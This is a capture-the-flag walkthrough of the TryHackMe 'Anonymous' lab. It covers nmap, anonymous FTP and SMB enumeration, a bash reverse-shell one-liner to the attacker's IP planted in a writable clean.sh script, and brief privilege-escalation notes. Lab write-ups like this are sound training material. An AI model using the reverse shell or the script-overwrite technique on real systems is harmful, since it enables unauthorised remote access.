Walkthrough

Gaining a Foothold

Nmap

┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV 10.10.70.108    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-13 07:16 EST
Nmap scan report for 10.10.70.108
Host is up (0.28s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 111      113          4096 Jun 04  2020 scripts [NSE: writeable]
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.8.252.53
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8b:ca:21:62:1c:2b:23:fa:6b:c6:1f:a8:13:fe:1c:68 (RSA)
|   256 95:89:a4:12:e2:e6:ab:90:5d:45:19:ff:41:5f:74:ce (ECDSA)
|_  256 e1:2a:96:a4:ea:8f:68:8f:cc:74:b8:f0:28:72:70:cd (ED25519)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -2s
| smb2-time: 
|   date: 2024-01-13T12:26:21
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: anonymous
|   NetBIOS computer name: ANONYMOUS\x00
|   Domain name: \x00
|   FQDN: anonymous
|_  System time: 2024-01-13T12:26:21+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: ANONYMOUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 581.59 seconds

Strings

┌──(kali㉿kali)-[~]
└─$ strings puppos.jpeg 
EExif
Three Pembroke Welsh Corgis side by side outdoors. Approved by Denise Flaim September 2018 and Susan Sprung.
Adobe Stock #118102236
Canon
Canon EOS 5D Mark II
Adobe Photoshop CC 2018 (Macintosh)
2019:02:18 12:24:51
Photographer: Tatyana Panova
Tatyana Panova
www.tpanova.ru

FTP

┌──(kali㉿kali)-[~]
└─$ ftp 10.10.70.108
Connected to 10.10.70.108.
220 NamelessOne's FTP Server!
Name (10.10.70.108:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||31967|)
150 Here comes the directory listing.
drwxrwxrwx    2 111      113          4096 Jun 04  2020 scripts
226 Directory send OK.
ftp> cd scripts
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||31977|)
150 Here comes the directory listing.
-rwxr-xrwx    1 1000     1000          314 Jun 04  2020 clean.sh
-rw-rw-r--    1 1000     1000         1032 Jan 13 12:20 removed_files.log
-rw-r--r--    1 1000     1000           68 May 12  2020 to_do.txt
226 Directory send OK.

Tip

Binary always good

ASCII tends to have issues

mget* gets it all

SMB

┌──(kali㉿kali)-[~]
└─$ smbclient -L \\\\10.10.70.108\\
Password for [WORKGROUP\kali]:

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        pics            Disk      My SMB Share Directory for Pics
        IPC$            IPC       IPC Service (anonymous server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            ANONYMOUS
                                                                                                                    
┌──(kali㉿kali)-[~]
└─$ smbclient \\\\10.10.70.108\\pics
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun May 17 07:11:34 2020
  ..                                  D        0  Wed May 13 21:59:10 2020
  corgo2.jpg                          N    42663  Mon May 11 20:43:42 2020
  puppos.jpeg                         N   265188  Mon May 11 20:43:42 2020

corgo2.jpg

puppos.jpeg

Reverse Shell

bash -i >& /dev/tcp/10.8.252.53/7777 0>&1

Edit clean.sh and upload it to scripts directory

┌──(kali㉿kali)-[~]
└─$ ftp 10.10.70.108   
Connected to 10.10.70.108.
220 NamelessOne's FTP Server!
Name (10.10.70.108:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||62981|)
150 Here comes the directory listing.
drwxrwxrwx    2 111      113          4096 Jun 04  2020 scripts
226 Directory send OK.
ftp> cd scripts
250 Directory successfully changed.
ftp> put clean.sh
local: clean.sh remote: clean.sh
229 Entering Extended Passive Mode (|||61781|)
150 Ok to send data.
100% |***********************************************************************|    55        1.00 MiB/s    00:00 ETA
226 Transfer complete.
55 bytes sent in 00:00 (0.09 KiB/s)

Start up a listener and wait

Escalating Privileges

TTY Shell

https://wiki.zacheller.dev/pentest/privilege-escalation/spawning-a-tty-shell

SUID

LinEnum.sh suggest env

TTY shell and then gtfo bins

Anonymous

TryHackMe | Anonymous

Walkthrough

Gaining a Foothold

Escalating Privileges

Video